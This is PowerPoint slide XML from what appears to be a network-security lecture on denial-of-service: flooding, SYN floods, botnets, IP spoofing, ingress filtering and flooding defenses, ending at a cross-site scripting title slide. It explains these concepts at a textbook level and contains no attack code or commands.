                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>t resolve to internal addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Protects browsers inside the organization</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7284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276600"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DDoS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Topic</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Distributed Denial-of-Service (DDOS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>An attack on network availability</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67586" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3871914" y="2428875"/>
            <a:ext cx="4448175" cy="2000250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247645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Topic</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Distributed Denial-of-Service (DDOS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>An attack on network availability</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68610" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3814764" y="2571750"/>
            <a:ext cx="4562475" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="749163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Motivation</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The best part of IP connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>You can send to any other host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The worst part of IP connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Any host can send packets to you!</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69634" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="3429001"/>
            <a:ext cx="4629150" cy="1819275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235749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Motivation (2)</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Flooding a host with many packets can interfere with its IP connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Host may become unresponsive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>This is a form of denial-of-service</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a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="3733801"/>
            <a:ext cx="4286250" cy="1838325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2966789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Goal and Threat Model</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Goal is for host to keep network connectivity for desired services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Threat is Trudy may overwhelm host with undesired traffic</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71682" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429001" y="3733800"/>
            <a:ext cx="5553075" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303804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Internet Reality</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Distributed Denial-of-Service is a huge problem today!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Akamai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Q3-12 reports DDOS against US banks peaking at 65 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Gbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> of traffic flooding the bank</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>There are no great solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CDNs, network traffic filtering, and best practices all help</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4600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Denial-of-service means a system is made unavailable to intended users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Typically because its resources are consumed by attackers instead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In the network context:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“System” means server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“Resources” mean bandwidth (network) or CPU/memory (host)</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180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276600"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNSSEC</a:t>
            </a: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Host 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Strange packets can sap host resources!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“Ping of Death” malformed packet (bug the kernel and system crash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“SYN flood” sends many TCP connect requests and never follows up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Few bad packets can overwhelm host</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Patches exist for these vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Read about “SYN cookies” for interest</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2706" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4381500" y="3419476"/>
            <a:ext cx="3429000" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144421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Network 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Network DOS needs many packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>To saturate network links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Causes high congestion/loss</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Helpful to have many attackers or Distributed Denial-of-Service</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3730" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3481389" y="2657475"/>
            <a:ext cx="5229225" cy="1543050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="695557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Distributed Denial-of-Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646522" y="1600200"/>
            <a:ext cx="11545478" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> provides many attackers in the form of compromised hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hosts send traffic flood to victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Network saturates near victim</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4754" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="3505201"/>
            <a:ext cx="4914900" cy="1971675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147573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Complication: Spoofing</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Attackers can falsify their IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Put fake source address on packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Historically network doesn’t check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hides location of the attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Called IP address spoofing</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5778" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733801" y="3810000"/>
            <a:ext cx="4848225" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2625780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Spoofing (2)</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Actually, it’s worse than that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trudy can trick Bob into really sending packets to Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>To do so, Trudy spoofs Alice to Bob</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3581401" y="3352800"/>
            <a:ext cx="5476875" cy="1657350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160318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Best Practice: Ingress Filtering</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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Idea: Validate the IP source address of packets at ISP boundary (Duh!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ingress filtering is a best practice, but deployment has been slow</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pic>
        <p:nvPicPr>
          <p:cNvPr id="77826" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3657601"/>
            <a:ext cx="5467350" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405144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Flooding Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1219200"/>
            <a:ext cx="7772400" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. Increase network capacity around the server; harder to cause loss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Use a CDN for high peak capacity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. Filter out attack traffic within the network (at routers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The earlier the filtering, the better</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ultimately what is needed, but ad hoc measures by ISPs today</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78309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11393262" y="6410412"/>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2" name="object 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208739" y="2461625"/>
            <a:ext cx="5774267" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="1" spc="-20" dirty="0"/>
              <a:t>Cross-site</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-7" dirty="0"/>
              <a:t>Scripting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11223623" y="6514106"/>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2" name="object 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965411" y="450262"/>
            <a:ext cx="10258212" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
